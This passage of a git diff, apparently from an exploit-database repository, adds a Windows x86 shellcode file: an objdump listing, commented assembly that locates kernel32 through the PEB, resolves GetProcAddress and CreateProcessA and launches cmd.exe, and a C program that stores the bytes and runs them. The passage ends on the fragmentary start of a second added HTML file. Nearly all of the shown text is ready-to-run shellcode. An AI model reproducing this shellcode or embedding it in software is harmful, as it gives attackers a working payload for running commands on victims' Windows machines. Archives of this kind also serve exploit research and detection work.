+ 38: 75 eb jne 25
+ 3a: 81 78 08 64 64 72 65 cmpl $0x65726464,0x8(%eax)
+ 41: 75 e2 jne 25
+ 43: 8b 73 1c mov 0x1c(%ebx),%esi
+ 46: 01 ce add %ecx,%esi
+ 48: 8b 14 96 mov (%esi,%edx,4),%edx
+ 4b: 01 ca add %ecx,%edx
+ 4d: 89 d6 mov %edx,%esi
+ 4f: 89 cf mov %ecx,%edi
+ 51: 31 db xor %ebx,%ebx
+ 53: 68 79 41 41 41 push $0x41414179
+ 58: 66 89 5c 24 01 mov %bx,0x1(%esp)
+ 5d: 68 65 6d 6f 72 push $0x726f6d65
+ 62: 68 65 72 6f 4d push $0x4d6f7265
+ 67: 68 52 74 6c 5a push $0x5a6c7452
+ 6c: 54 push %esp
+ 6d: 51 push %ecx
+ 6e: ff d2 call *%edx
+ 70: 83 c4 10 add $0x10,%esp
+ 73: 31 c9 xor %ecx,%ecx
+ 75: 89 ca mov %ecx,%edx
+ 77: b2 54 mov $0x54,%dl
+ 79: 51 push %ecx
+ 7a: 83 ec 54 sub $0x54,%esp
+ 7d: 8d 0c 24 lea (%esp),%ecx
+ 80: 51 push %ecx
+ 81: 52 push %edx
+ 82: 51 push %ecx
+ 83: ff d0 call *%eax
+ 85: 59 pop %ecx
+ 86: 31 d2 xor %edx,%edx
+ 88: 68 73 41 42 42 push $0x42424173
+ 8d: 66 89 54 24 02 mov %dx,0x2(%esp)
+ 92: 68 6f 63 65 73 push $0x7365636f
+ 97: 68 74 65 50 72 push $0x72506574
+ 9c: 68 43 72 65 61 push $0x61657243
+ a1: 8d 14 24 lea (%esp),%edx
+ a4: 51 push %ecx
+ a5: 52 push %edx
+ a6: 57 push %edi
+ a7: ff d6 call *%esi
+ a9: 59 pop %ecx
+ aa: 83 c4 10 add $0x10,%esp
+ ad: 31 db xor %ebx,%ebx
+ af: 68 65 78 65 41 push $0x41657865
+ b4: 88 5c 24 03 mov %bl,0x3(%esp)
+ b8: 68 63 6d 64 2e push $0x2e646d63
+ bd: 8d 1c 24 lea (%esp),%ebx
+ c0: 31 d2 xor %edx,%edx
+ c2: b2 44 mov $0x44,%dl
+ c4: 89 11 mov %edx,(%ecx)
+ c6: 8d 51 44 lea 0x44(%ecx),%edx
+ c9: 56 push %esi
+ ca: 31 f6 xor %esi,%esi
+ cc: 52 push %edx
+ cd: 51 push %ecx
+ ce: 56 push %esi
+ cf: 56 push %esi
+ d0: 56 push %esi
+ d1: 56 push %esi
+ d2: 56 push %esi
+ d3: 56 push %esi
+ d4: 53 push %ebx
+ d5: 56 push %esi
+ d6: ff d0 call *%eax
+ d8: 5e pop %esi
+ d9: 83 c4 08 add $0x8,%esp
+ dc: 31 db xor %ebx,%ebx
+ de: 68 65 73 73 41 push $0x41737365
+ e3: 88 5c 24 03 mov %bl,0x3(%esp)
+ e7: 68 50 72 6f 63 push $0x636f7250
+ ec: 68 45 78 69 74 push $0x74697845
+ f1: 8d 1c 24 lea (%esp),%ebx
+ f4: 53 push %ebx
+ f5: 57 push %edi
+ f6: ff d6 call *%esi
+ f8: 31 c9 xor %ecx,%ecx
+ fa: 51 push %ecx
+ fb: ff d0 call *%eax
+*/
+
+
+/*
+section .text
+ global _start
+_start:
+
+
+xor ecx,ecx
+mov eax,[fs:ecx+0x30] ;PEB
+mov eax,[eax+0xc] ;PEB->ldr
+mov esi,[eax+0x14] ;PEB->ldr.InMemOrderModuleList
+lodsd
+xchg esi,eax
+lodsd
+mov ecx,[eax+0x10] ;kernel32 base address
+
+
+xor ebx,ebx
+mov ebx,[ecx+0x3c] ;DOS->elf_anew
+add ebx,ecx ;PE HEADER
+mov ebx,[ebx+0x78] ;DataDirectory->VirtualAddress
+add ebx,ecx ;IMAGE_EXPORT_DIRECTORY
+
+mov esi,[ebx+0x20] ;AddressOfNames
+add esi,ecx
+
+
+;---------------------------------------------
+
+xor edx,edx
+
+func:
+inc edx
+lodsd
+add eax,ecx
+cmp dword [eax],'GetP'
+jnz func
+cmp dword [eax+4],'rocA'
+jnz func
+cmp dword [eax+8],'ddre'
+jnz func
+
+
+;--------------------------------
+
+
+mov esi,[ebx+0x1c] ;AddressOfFunctions
+add esi,ecx
+
+mov edx,[esi+edx*4]
+add edx,ecx ;GetProcAddress()
+
+;-------------------------------------
+
+mov esi,edx
+mov edi,ecx
+
+;-------------------------
+
+
+xor ebx,ebx
+
+
+;finding address of RtlZeroMemory()
+
+push 0x41414179
+mov [esp+1],word bx
+push 0x726f6d65
+push 0x4d6f7265
+push 0x5a6c7452
+
+
+
+push esp
+push ecx
+
+call edx
+
+;------------------------------
+add esp,16
+;-----------------------------------
+
+
+;zero out 84 bytes
+
+
+xor ecx,ecx
+mov edx,ecx
+
+mov dl,84
+
+push ecx
+
+sub esp,84
+
+lea ecx,[esp]
+
+push ecx
+
+push edx
+push ecx
+
+call eax
+
+
+;----------------------------
+
+;finding address of CreateProcessA()
+pop ecx
+
+xor edx,edx
+
+push 0x42424173
+mov [esp+2],word dx
+push 0x7365636f
+push 0x72506574
+push 0x61657243
+
+lea edx,[esp]
+
+push ecx
+
+push edx
+push edi
+
+call esi
+
+
+;--------------------------------
+;CreateProcessA(NULL,"cmd.exe",NULL,NULL,0,NULL,NULL,NULL,&STARTUPINFO,&PROCESS_INFORMATION)
+
+pop ecx
+
+add esp,16
+
+xor ebx,ebx
+push 0x41657865
+mov [esp+3],byte bl
+push 0x2e646d63
+
+lea ebx,[esp]
+
+
+xor edx,edx
+mov dl,68
+
+mov [ecx],edx
+
+lea edx,[ecx+68]
+
+
+push esi ;
+
+xor esi,esi
+
+
+push edx
+push ecx
+
+push esi
+push esi
+push esi
+push esi
+push esi
+push esi
+
+push ebx
+push esi
+
+call eax
+
+pop esi
+
+;-------------------------------------
+;finding address of ExitProcess()
+
+add esp,8
+
+xor ebx,ebx
+
+push 0x41737365
+mov [esp+3],byte bl
+push 0x636f7250
+push 0x74697845
+
+
+lea ebx,[esp]
+
+
+push ebx
+push edi
+
+call esi
+
+xor ecx,ecx
+push ecx
+call eax
+*/
+
+
+#include
+#include
+char shellcode[]=\
+
+"\x31\xc9\x64\x8b\x41\x30\x8b\x40\x0c\x8b\x70\x14\xad\x96\xad\x8b\x48\x10\x31\xdb\x8b\x59\x3c\x01\xcb\x8b\x5b\x78\x01\xcb\x8b\x73\x20\x01\xce\x31\xd2\x42\xad\x01\xc8\x81\x38\x47\x65\x74\x50\x75\xf4\x81\x78\x04\x72\x6f\x63\x41\x75\xeb\x81\x78\x08\x64\x64\x72\x65\x75\xe2\x8b\x73\x1c\x01\xce\x8b\x14\x96\x01\xca\x89\xd6\x89\xcf\x31\xdb\x68\x79\x41\x41\x41\x66\x89\x5c\x24\x01\x68\x65\x6d\x6f\x72\x68\x65\x72\x6f\x4d\x68\x52\x74\x6c\x5a\x54\x51\xff\xd2\x83\xc4\x10\x31\xc9\x89\xca\xb2\x54\x51\x83\xec\x54\x8d\x0c\x24\x51\x52\x51\xff\xd0\x59\x31\xd2\x68\x73\x41\x42\x42\x66\x89\x54\x24\x02\x68\x6f\x63\x65\x73\x68\x74\x65\x50\x72\x68\x43\x72\x65\x61\x8d\x14\x24\x51\x52\x57\xff\xd6\x59\x83\xc4\x10\x31\xdb\x68\x65\x78\x65\x41\x88\x5c\x24\x03\x68\x63\x6d\x64\x2e\x8d\x1c\x24\x31\xd2\xb2\x44\x89\x11\x8d\x51\x44\x56\x31\xf6\x52\x51\x56\x56\x56\x56\x56\x56\x53\x56\xff\xd0\x5e\x83\xc4\x08\x31\xdb\x68\x65\x73\x73\x41\x88\x5c\x24\x03\x68\x50\x72\x6f\x63\x68\x45\x78\x69\x74\x8d\x1c\x24\x53\x57\xff\xd6\x31\xc9\x51\xff\xd0";
+
+main()
+{
+printf("shellcode lenght %ld\n",(long)strlen(shellcode));
+(* (int(*)()) shellcode) ();
+}
diff --git a/platforms/windows/dos/40253.html b/platforms/windows/dos/40253.html
new file mode 100755
index 000000000..437a03116
--- /dev/null
+++ b/platforms/windows/dos/40253.html
@@ -0,0 +1,21 @@
+
+
+
+
+
+iiThS9l_J8
+
+A7
+